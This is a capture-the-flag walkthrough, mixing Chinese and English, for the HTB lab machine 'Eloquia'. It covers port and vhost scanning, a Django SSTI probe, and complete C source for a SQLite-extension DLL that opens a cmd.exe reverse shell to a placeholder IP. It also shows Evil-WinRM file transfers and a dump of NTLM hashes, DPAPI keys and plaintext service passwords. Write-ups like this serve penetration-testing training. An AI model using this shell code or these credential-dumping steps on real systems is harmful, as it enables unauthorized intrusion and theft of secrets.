Eloquia
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Eloquia]
└─# nmap 10.129.12.100 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-13 18:33 EST
Nmap scan report for 10.129.12.100
Host is up (0.22s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 16.03 seconds
┌──(root㉿kali)-[~/Desktop/htb/Eloquia]
└─# nmap 10.129.12.100 -p80,5985 -sCV -O
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-14 02:18 EST
Nmap scan report for eloquia.htb (10.129.12.100)
Host is up (0.080s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Eloquia
|_http-server-header: Microsoft-IIS/10.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.66 seconds
1.1.2. vhost
┌──(root㉿kali)-[~/Desktop/htb/Eloquia]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://eloquia.htb -H "Host: FUZZ.eloquia.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://eloquia.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.eloquia.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [19966/19966] :: Job [1/1] :: 589 req/sec :: Duration: [0:00:36] :: Errors: 0 ::
1.1.3. dirsearch
┌──(root㉿kali)-[~/Desktop/htb/Eloquia]
└─# dirsearch -u http://eloquia.htb/ -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/Eloquia/reports/http_eloquia.htb/__25-12-14_06-29-04.txt
Target: http://eloquia.htb/
[06:29:04] Starting:
[06:29:21] 301 - 0B - /about -> /about/
[06:29:22] 301 - 0B - /accounts/login -> /accounts/login/
[06:30:04] 301 - 0B - /contact -> /contact/
Task Completed
1.2. web
这是一个经验分享平台
1.2.1. Django
注册账号的时候我输入了一个存在的账号和一个弱密码,它提示了下面的信息
对于下面的这些警告,他经常出现在 Django 框架中。这是此框架很常见的一种密码验证器 Password management in Django | Django documentation | Django
The password is too similar to the email.
This password is too short. It must contain at least 8 characters.
This password is too common.
This password is entirely numeric.
网页插件wappalyzer也可以帮我识别出这是一个 Django 框架写的网站
1.2.2. SSTI
我分别在标题、正文、评论插入了 {{7*7}} 发现标题和正文是存在 SSTI 的
注: 这里要成功发表文章需要你先上传一个banner,否则会发表失败
DLL &sqli
typedef struct sqlite3 sqlite3;
typedef struct sqlite3_api_routines sqlite3_api_routines;
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")
__declspec(dllexport) int sqlite3_extension_init(
sqlite3 *db,
char **pzErrMsg,
const sqlite3_api_routines *pApi
) {
WSADATA wsaData;
SOCKET s;
struct sockaddr_in sa;
STARTUPINFO si;
PROCESS_INFORMATION pi;
WSAStartup(MAKEWORD(2,2), &wsaData);
s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr("192.168.1.100"); // ← CHANGE THIS!
sa.sin_port = htons(81);
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) == 0) {
ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = (HANDLE)s;
si.hStdOutput = (HANDLE)s;
si.hStdError = (HANDLE)s;
if (CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
}
closesocket(s);
WSACleanup();
return 0;
}
x86_64-w64-mingw32-gcc -shared -o shell2.dll shell2.c -lws2_32
2. Olivia.kat
2.1. Recon
*Evil-WinRM* PS C:\Users\Olivia.KAT\desktop> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 876
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 488
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1092
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1436
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2212
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 624
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 632
这不是一个AD机器
2.1.1. 文件上传
此用户权限极低,certutil.exe 用不了,且 powershell 被限制,导致winrm也无法成功上传文件
*Evil-WinRM* PS C:\Users\Olivia.KAT\AppData\Local\Temp> upload winPEAS.bat
Info: Uploading /root/Desktop/htb/Eloquia/winPEAS.bat to C:\Users\Olivia.KAT\AppData\Local\Temp\winPEAS.bat
Error: Upload failed. Check filenames or paths: [WinRM::FS::Core::FileTransporter] Upload failed (exitcode: 0), but stderr present
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:51 char:12
+ return $ExecutionContext.SessionState.Path.GetUnresolvedProviderP ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage
Cannot bind argument to parameter 'Path' because it is null.
At line:19 char:18
+ if(Test-Path $dst -PathType Container) {
+ ~~~~
+ CategoryInfo : InvalidData: (:) [Test-Path], ParameterBindingValidationException
+ FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.TestPathCommand
Cannot bind argument to parameter 'Path' because it is null.
At line:24 char:41
+ chk_exists = ($exists = Test-Path $dst -PathType Leaf)
+ ~~~~
+ CategoryInfo : InvalidData: (:) [Test-Path], ParameterBindingValidationException
+ FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.TestPathCommand
*Evil-WinRM* PS C:\Users\Olivia.KAT\AppData\Local\Temp> certutil -f -split -urlcache http://10.10.14.20/winPEAS.bat
Program 'certutil.exe' failed to run: Access is deniedAt line:1 char:1
+ certutil -f -split -urlcache http://10.10.14.20/winPEAS.bat
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ certutil -f -split -urlcache http://10.10.14.20/winPEAS.bat
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
这里采用 SMB的方式进行上传
┌──(root㉿kali)-[~/Desktop/htb/Eloquia]
└─# impacket-smbserver share ./ -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\Users\public> net use \\10.10.14.20\share
The command completed successfully.
*Evil-WinRM* PS C:\tmp> copy \\10.10.14.20\share\winPEAS.bat $env:TEMP\winpeas.bat
*Evil-WinRM* PS C:\tmp> echo $env
*Evil-WinRM* PS C:\tmp> $env:TEMP
C:\Users\Olivia.KAT\AppData\Local\Temp
*Evil-WinRM* PS C:\tmp> cd C:\Users\Olivia.KAT\AppData\Local\Temp
*Evil-WinRM* PS C:\Users\Olivia.KAT\AppData\Local\Temp> dir
Directory: C:\Users\Olivia.KAT\AppData\Local\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/14/2025 12:06 AM 36950 winpeas.bat
2.1.2. DF
当我执行 winPEAS 发现还有杀软
*Evil-WinRM* PS C:\Users\Olivia.KAT\AppData\Local\Temp> .\win.bat
Program 'win.bat' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\win.bat
+ ~~~~~~~~~.
At line:1 char:1
+ .\win.bat
+ ~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
3. Hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e63413bab01a0b8820983496c0be3a9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:257cca897df1116e7b641468d7164200:::
web:1000:aad3b435b51404eeaad3b435b51404ee:aa04ab562321912f63f2488d22756953:::
Olivia.KAT:1001:aad3b435b51404eeaad3b435b51404ee:2cbfd71fcc7181dade35b694169b2256:::
c1trus:1002:aad3b435b51404eeaad3b435b51404ee:e45a314c664d40a227f9540121d1a29d:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
dpapi_machinekey:0x12f720c1985c84fdda225fea441975e9babaf129
dpapi_userkey:0x3a981aae7e181bc85a3516a307f0a60bc6ab5c48
[*] NL$KM
0000 10 52 DF A9 4C 5C EF 8C A1 B1 15 D5 1C B6 B9 76 .R..L\.........v
0010 E1 25 89 31 9E 9A 5E BF E0 F4 83 5A 43 04 A7 42 .%.1..^....ZC..B
0020 E8 D1 24 66 0A 41 94 93 D6 4A 0E 56 7A 10 18 2B ..$f.A...J.Vz..+
0030 6A 1B C9 D2 9B 2F 42 2C B4 1D E4 55 73 DF EA DE j..../B,...Us...
NL$KM:1052dfa94c5cef8ca1b115d51cb6b976e12589319e9a5ebfe0f4835a4304a742e8d124660a419493d64a0e567a10182b6a1bc9d29b2f422cb41de45573dfeade
[*] _SC_eloquia.htb
(Unknown User):v3ryS0l!dP@sswd#1
[*] _SC_qooqle.htb
(Unknown User):v3ryS0l!dP@sswd#1
[*] Cleaning up...